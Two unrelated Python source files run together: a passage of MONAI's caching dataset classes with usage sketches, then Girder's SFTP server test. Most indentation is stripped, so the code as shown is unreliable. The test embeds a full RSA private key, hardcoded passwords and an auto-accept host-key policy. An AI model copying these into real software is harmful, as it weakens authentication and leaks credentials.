cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker processes to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cached content
(for example, randomly crop from the cached image and deepcopy the crop region)
or if every cache item is only used once in a `multi-processing` environment,
                may set `copy_cache=False` for better performance.
as_contiguous: whether to convert the cached NumPy array or PyTorch tensor to be contiguous.
it may help improve the performance of following logic.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.copy_cache = copy_cache
self.as_contiguous = as_contiguous
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
        Note: this func should be called after an entire epoch, and `persistent_workers=False` must be set
        in the PyTorch DataLoader, because it needs to create new worker processes based on the newly
        generated cache content.
"""
self.data = data
self._cache = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item = apply_transform(_xform, item)
if self.as_contiguous:
item = convert_to_contiguous(item, memory_format=torch.contiguous_format)
return item
def _transform(self, index: int):
if index % len(self) >= self.cache_num: # support negative index
# no cache for this index, execute all the transforms directly
return super()._transform(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
# only need to deep copy data on first non-deterministic transform
if not start_run:
start_run = True
if self.copy_cache:
data = deepcopy(data)
data = apply_transform(_transform, data)
return data
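# Editor's note: an illustrative sketch with in-memory data. With 100 items,
# cache_num=30 and cache_rate=0.5, the effective cache size is
# min(30, int(100 * 0.5), 100) == 30 items, pre-processed by the deterministic
# ScaleIntensityd before the first epoch.
def _example_cache_dataset():
    from monai.transforms import Compose, RandFlipd, ScaleIntensityd

    data = [{"image": np.arange(16, dtype=np.float32).reshape(1, 4, 4) + i} for i in range(100)]
    transform = Compose([ScaleIntensityd(keys="image"), RandFlipd(keys="image", prob=0.5)])
    return CacheDataset(data=data, transform=transform, cache_num=30, cache_rate=0.5, num_workers=2)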
class SmartCacheDataset(Randomizable, CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
    For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, `cache_num=4`, and `replace_rate=0.25`,
    the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
        epoch 3: [image3, image4, image5, image1]
        epoch 4: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
During training call `set_data()` to update input data and recompute cache content, note to call
`shutdown()` to stop first, then update data and call `start()` to restart.
Note:
        This replacement will not work in the following cases:
        1. Set the `multiprocessing_context` of DataLoader to `spawn`.
        2. Run on Windows (where the default multiprocessing method is `spawn`) with `num_workers` greater than 0.
3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0.
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer,
otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training.
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch.
it will not modify the original input data sequence in-place.
seed: random seed if shuffle is `True`, default to `0`.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cache content
or every cache item is only used once in a `multi-processing` environment,
            may set `copy_cache=False` for better performance.
as_contiguous: whether to convert the cached NumPy array or PyTorch tensor to be contiguous.
it may help improve the performance of following logic.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
shuffle: bool = True,
seed: int = 0,
copy_cache: bool = True,
as_contiguous: bool = True,
) -> None:
if shuffle:
self.set_random_state(seed=seed)
data = copy(data)
self.randomize(data)
self.shuffle = shuffle
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress, copy_cache, as_contiguous)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
            warnings.warn(
                "cache_num is greater than or equal to the dataset length, falling back to regular monai.data.CacheDataset."
            )
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call `shutdown()` before calling this func.
"""
if self.is_started():
            warnings.warn("SmartCacheDataset is not shut down yet; shutting it down now.")
self.shutdown()
if self.shuffle:
data = copy(data)
self.randomize(data)
super().set_data(data)
def randomize(self, data: Sequence) -> None:
try:
self.R.shuffle(data)
except TypeError as e:
warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.")
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
del self._cache[: self._replace_num]
self._cache.extend(self._replacements)
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
        Update cache items for the current epoch; this function needs to be called before every epoch.
        If the cache has been shut down before, the `_replace_mgr` thread needs to be restarted.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._start_pos = 0
self._compute_data_idx()
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
        # wait until the replace mgr is done with the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
        Compute the expected items for the replacement in the next epoch, executing the deterministic transforms.
        It supports multiple threads to accelerate the computation.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
        Wait for the thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
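# Editor's note: an illustrative sketch of the 4-step usage described above, using
# in-memory data. With cache_num=4 and replace_rate=0.25, each update_cache() call
# swaps in ceil(4 * 0.25) == 1 replacement item.
def _example_smart_cache_dataset():
    from monai.transforms import Compose, RandFlipd, ScaleIntensityd

    data = [{"image": np.arange(16, dtype=np.float32).reshape(1, 4, 4) + i} for i in range(5)]
    transform = Compose([ScaleIntensityd(keys="image"), RandFlipd(keys="image", prob=0.5)])
    ds = SmartCacheDataset(
        data=data, transform=transform, replace_rate=0.25, cache_num=4, num_init_workers=2, num_replace_workers=2
    )
    ds.start()                         # step 2: start the background replacement thread
    for _epoch in range(3):
        for i in range(len(ds)):       # only the cache_num == 4 cached items per epoch
            _item = ds[i]
        ds.update_cache()              # step 3: swap in the replacement items
    ds.shutdown()                      # step 4: stop the background thread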
class ZipDataset(Dataset):
"""
    Zip several PyTorch datasets and output data (with the same index) together in a tuple.
    If the output of a single dataset is already a tuple, flatten it and extend it to the result.
    For example: if datasetA returns (img, imgmeta) and datasetB returns (seg, segmeta),
    finally return (img, imgmeta, seg, segmeta).
    If the datasets don't have the same length, the minimum length among them is used as the length
    of ZipDataset.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
            transform: a callable data transform that operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min(len(dataset) for dataset in self.data)
def _transform(self, index: int):
def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
    If training is based on Nifti-format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
    If training is based on images and the metadata, the array transforms can not be composed
    because several transforms receive multiple parameters or return multiple values. Users then need
    to define their own callable method to parse metadata from `LoadImage` or set the `affine` matrix
    to the `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
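# Editor's note: an illustrative sketch of the synchronized seeds. Because the same
# seed is pushed into both random transforms on every __getitem__, the image and its
# segmentation are flipped identically.
def _example_array_dataset():
    from monai.transforms import RandFlip

    imgs = [np.arange(16, dtype=np.float32).reshape(1, 4, 4)]
    segs = [np.arange(16, dtype=np.float32).reshape(1, 4, 4)]
    ds = ArrayDataset(img=imgs, img_transform=RandFlip(prob=0.5), seg=segs, seg_transform=RandFlip(prob=0.5))
    img, seg = ds[0]
    # both outputs underwent the same random decision, so they stay identical
    assert np.allclose(np.asarray(img), np.asarray(seg))
    return ds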
class NPZDictItemDataset(Dataset):
"""
Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and
stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts
mapping names to an item extracted from the loaded arrays.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Args:
npzfile: Path to .npz file or stream containing .npz file data
        keys: maps the keys to load from the file to the names they are stored under in the dataset
transform: Transform to apply to batch dict
other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__
"""
def __init__(
self,
npzfile: Union[str, IO],
keys: Dict[str, str],
transform: Optional[Callable[..., Dict[str, Any]]] = None,
other_keys: Optional[Sequence[str]] = (),
):
self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM"
self.keys: Dict[str, str] = dict(keys)
dat = np.load(npzfile)
self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()}
self.length = self.arrays[first(self.keys.values())].shape[0]
self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys}
for k, v in self.arrays.items():
if v.shape[0] != self.length:
raise ValueError(
"All loaded arrays must have the same first dimension "
f"size {self.length}, array `{k}` has size {v.shape[0]}"
)
super().__init__([], transform)
def __len__(self):
return self.length
def _transform(self, index: int):
data = {k: v[index] for k, v in self.arrays.items()}
if not self.transform:
return data
result = apply_transform(self.transform, data)
if isinstance(result, dict) or (isinstance(result, list) and isinstance(result[0], dict)):
return result
raise AssertionError("With a dict supplied to apply_transform, should return a dict or a list of dicts.")
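# Editor's note: an illustrative sketch; the .npz content is built in memory with
# numpy.savez, and the stored "imgs" array is exposed under the dataset key "image".
def _example_npz_dict_item_dataset():
    from io import BytesIO

    buf = BytesIO()
    np.savez(buf, imgs=np.zeros((3, 4, 4), dtype=np.float32))
    buf.seek(0)
    ds = NPZDictItemDataset(npzfile=buf, keys={"imgs": "image"})
    assert len(ds) == 3 and ds[0]["image"].shape == (4, 4)
    return ds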
class CSVDataset(Dataset):
"""
    Dataset to load data from CSV files and generate a list of dictionaries,
    where every dictionary maps to a row of a CSV file, and the keys of the dictionary
    map to the column names of the CSV file.
    It can load multiple CSV files and join the tables via the additional `kwargs` arg.
    It supports loading only specific rows and columns,
    and it can also group several loaded columns to generate a new column. For example,
    set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, and the output can be::
[
{"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]},
{"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]},
]
Args:
        src: if provided as the filename of a CSV file, it can be a str, URL, path object or file-like object to load.
            It also supports providing a pandas `DataFrame` directly, which skips loading from a filename.
            If a list of filenames or pandas `DataFrame`s is provided, it will join the tables.
row_indices: indices of the expected rows to load. it should be a list,
            every item can be an int or a range `[start, end)` of the indices.
for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None,
load all the rows in the file.
col_names: names of the expected columns to load. if None, load all the columns.
col_types: `type` and `default value` to convert the loaded columns, if None, use original data.
it should be a dictionary, every item maps to an expected column, the `key` is the column
name and the `value` is None or a dictionary to define the default value and data type.
the supported keys in dictionary are: ["type", "default"]. for example::
col_types = {
"subject_id": {"type": str},
"label": {"type": int, "default": 0},
"ehr_0": {"type": float, "default": 0.0},
"ehr_1": {"type": float, "default": 0.0},
"image": {"type": str, "default": None},
}
col_groups: args to group the loaded columns to generate a new column,
it should be a dictionary, every item maps to a group, the `key` will
be the new column name, the `value` is the names of columns to combine. for example:
`col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}`
transform: transform to apply on the loaded items of a dictionary data.
kwargs: additional arguments for `pandas.merge()` API to join tables.
.. deprecated:: 0.8.0
``filename`` is deprecated, use ``src`` instead.
"""
@deprecated_arg(name="filename", new_name="src", since="0.8", msg_suffix="please use `src` instead.")
def __init__(
self,
        src: Optional[Union[str, Sequence[str]]] = None,  # can also be a `DataFrame` or a sequence of `DataFrame`s
row_indices: Optional[Sequence[Union[int, str]]] = None,
col_names: Optional[Sequence[str]] = None,
col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None,
col_groups: Optional[Dict[str, Sequence[str]]] = None,
transform: Optional[Callable] = None,
**kwargs,
):
srcs = (src,) if not isinstance(src, (tuple, list)) else src
dfs: List = []
for i in srcs:
if isinstance(i, str):
dfs.append(pd.read_csv(i))
elif isinstance(i, pd.DataFrame):
dfs.append(i)
else:
raise ValueError("`src` must be file path or pandas `DataFrame`.")
# in case treating deprecated arg `filename` as kwargs, remove it from `kwargs`
kwargs.pop("filename", None)
data = convert_tables_to_dicts(
dfs=dfs, row_indices=row_indices, col_names=col_names, col_types=col_types, col_groups=col_groups, **kwargs
)
super().__init__(data=data, transform=transform)
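# Editor's note: an illustrative sketch; the DataFrame below stands in for a loaded
# CSV table, and `col_groups` assembles the "meta_*" columns into a new "meta" entry
# roughly as shown in the class docstring.
def _example_csv_dataset():
    df = pd.DataFrame({"image": ["./image0.nii", "./image1.nii"], "meta_0": [11, 21], "meta_1": [12, 22]})
    return CSVDataset(src=df, col_groups={"meta": ["meta_0", "meta_1"]})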
|
sftp_test.py
|
# -*- coding: utf-8 -*-
import paramiko
import six
import socket
import stat
import threading
from .. import base
from girder.api import sftp
from girder.models.collection import Collection
from girder.models.folder import Folder
from girder.models.upload import Upload
from girder.models.user import User
from six.moves import StringIO
server = None
TEST_PORT = 10551
TEST_KEY = paramiko.RSAKey.from_private_key(StringIO("""-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAwdH5tlaZu52adYvW57DcAFknzOKX8+/axDmQdTcg1HwEOnT2
TMSFGciwUQMmya+0i23ZOUtZQutj8fb66szrBZ7qpIvSG6TRyxGuM6PkfAUcBCHO
TGFzaJPnnvUXC8dlxoUIdBaUCmSblvj2q2CTNy53ybAmiiSpahjvBO16pvjbNn+i
EGucSQn71OTMhoSOWtS/VcJC6JPd6kxSdl1EiESbOrjAdNDKMBnfYCkxPG4ulAqe
y5jpfgQiUC0Q3CoWbj/ybAv73JsFndPcpvI8n5EsXeptuWI4CXSorYOuVwURLuzP
z1PkI4ZsYnSnuQG/GReAZnwVDaVJ/uhYMMs1sQIDAQABAoIBADKOmguFBW7aCntU
8cbX7Fsu5mHcTXS1ASSkO1lH+wlSHCw/bCvUKz/xiIRpRQnhCkBAdCQs0mjRS+3G
1ea/cyKxNFWdnz3UvWCyCPWxb50mHAu74bssxFToF8fv+IX7CkJBW1YkuZMIcUlt
QbKsa1o+hcKXb0YjkAl73YU0iQTaet7B1x1X0qkVPEWWURTg3z65TNI96t8p28dh
4HgEoU0Jtfsfzb7u1H4/m3Q28J1S+cTkER/VIgLzMeYXr2MooIQc3QAMXATpXkhM
y6u0LYh+kW1XD4ZnyzTp49BMf76rS8VhsYN6f+jLhJUf/5O+m8NFGuCq15TFyQAH
vMBxPRECgYEA4+fxYuuOq+SilYpejD4EMwvrClixHOfTojlnAyUaJZSnyVp/Y4l+
QmFmbNpfRKN1fv24e9f9CmA8nd5A3kxBjJFhzaaxbFG+jI47fqOu9NadXPHaxvyq
BI2aHx4sqp/Z/ct/klht5hxD8UFMRFbaaLYAojKg1nL0g/88wwwN9LUCgYEA2bZh
873OGT7sNXHin2rXD5XEYXqjLy51hed4ZdtJXFrKhg8ozWqaOZ79GXustdRanzTV
zDeTweI0hg7adbKyBNeuQF8VSOK6ws2wPPCuUbQTVYaepqPuT+VhzAB1GVJ1uF/T
YxgqXOvg9QwnZ4Fjlv3b/52R89bTP+Yr6GcQdo0CgYAvLQ38igIodtVo2xGjOhso
bekjZSSUdTCLvhIixoVZDiKFPaRs+EMYfozzL2jVDnj95otPp3ALu8wQabdHzMUs
0dNK/JxxbaJh+fc6yasnp10/phjBY//VnXIvytE4KIq5TGyF4KQvI960i+27n7bq
QfJzoMNGYNlYkXcEcPRamQKBgQCVCYWElirAnZKWA6BgAYO3547ILGwJoIRTZmHF
WJif4IdDvpzwAkoRqAUbrM5Oq1BeLI0vf9xmnbPXEdP7PpkfN4bSCkVH3+557NT4
4spypBOYOM/iw9YgW6bXQHjpHMn5rZ/H9oMJmXAmUGupL6o9cwtnsTZ49lcnJypn
riZXAQKBgQCgiJ/A11HX7fUgFzBB9no2Sy1hS3u1Ld35nZf7RDegVoEn/UdWdOxn
H2T9t0EzIoSqkfPRrsqN8sv/TMIohS6frOpBojEvwUs5mxjVwswq/QgBSV2FqYck
VeccLgZzTSMNzCDMbtM+zGG5WktzFojrMIhfD0SM3CB3jECF+Dfdtg==
-----END RSA PRIVATE KEY-----
"""))
def setUpModule():
global server
server = sftp.SftpServer(('localhost', TEST_PORT), TEST_KEY)
serverThread = threading.Thread(target=server.serve_forever)
serverThread.daemon = True
serverThread.start()
def tearDownModule():
if server:
server.shutdown()
server.server_close()
base.dropAllTestDatabases()
class SftpTestCase(base.TestCase):
def testSftpService(self):
users = ({
'email': 'admin@email.com',
'login': 'admin',
'firstName': 'First',
'lastName': 'Last',
'password': 'passwd'
}, {
'email': 'regularuser@email.com',
'login': 'regularuser',
'firstName': 'First',
'lastName': 'Last',
'password': 'passwd'
})
admin, user = [User().createUser(**user) for user in users]
collections = ({
'name': 'public collection',
'public': True,
'creator': admin
}, {
'name': 'private collection',
'public': False,
'creator': admin
})
privateFolder = Folder().findOne({
'parentCollection': 'user',
'parentId': user['_id'],
'name': 'Private'
})
self.assertIsNotNone(privateFolder)
Upload().uploadFromFile(
six.BytesIO(b'hello world'), size=11, name='test.txt', parentType='folder',
parent=privateFolder, user=user)
for coll in collections:
Collection().createCollection(**coll)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Incorrect password should raise authentication error
with self.assertRaises(paramiko.AuthenticationException):
client.connect(
'localhost', TEST_PORT, username='admin', password='badpass', look_for_keys=False,
allow_agent=False)
# Authenticate as admin
client.connect(
'localhost', TEST_PORT, username='admin', password='passwd', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
self.assertEqual(sftpClient.listdir('/'), ['collection', 'user'])
# Listing an invalid top level entity should fail
with self.assertRaises(IOError):
sftpClient.listdir('/foo')
# Test listing of users, collections, and subfolders
self.assertEqual(set(sftpClient.listdir('/user/')), {'admin', 'regularuser'})
self.assertEqual(set(sftpClient.listdir('/user/admin')), {'Public', 'Private'})
self.assertEqual(
set(sftpClient.listdir('/collection')), {'public collection', 'private collection'})
self.assertEqual(sftpClient.listdir('/user/regularuser/Private'), ['test.txt'])
self.assertEqual(sftpClient.listdir('/user/regularuser/Private/test.txt'), ['test.txt'])
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/nonexistent')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private')
# Read a file using small enough buf size to require multiple chunks internally.
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
self.assertEqual(file.read(2), b'he')
self.assertEqual(file.read(), b'llo world')
# Make sure we enforce max buffer length
tmp, sftp.MAX_BUF_LEN = sftp.MAX_BUF_LEN, 2
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
with self.assertRaises(IOError):
file.read()
sftp.MAX_BUF_LEN = tmp
# Test stat capability
info = sftpClient.stat('/user/regularuser/Private')
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
# lstat should also work
info = sftpClient.lstat('/user/regularuser/Private/test.txt/test.txt')
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# File stat implementations should agree
info = file.stat()
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# Make sure we can stat the top-level entities
for path in ('/', '/user', '/collection'):
info = sftpClient.stat(path)
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
sftpClient.close()
client.close()
# Test that any username other than anonymous will fail using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('')
trans.close()
sock.close()
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('eponymous')
trans.close()
sock.close()
# Test that a connection can be opened for anonymous access using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
trans.auth_none(username='anonymous')
sftpClient = paramiko.SFTPClient.from_transport(trans)
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
trans.close()
sock.close()
# Test anonymous access
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
'localhost', TEST_PORT, username='anonymous', password='', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
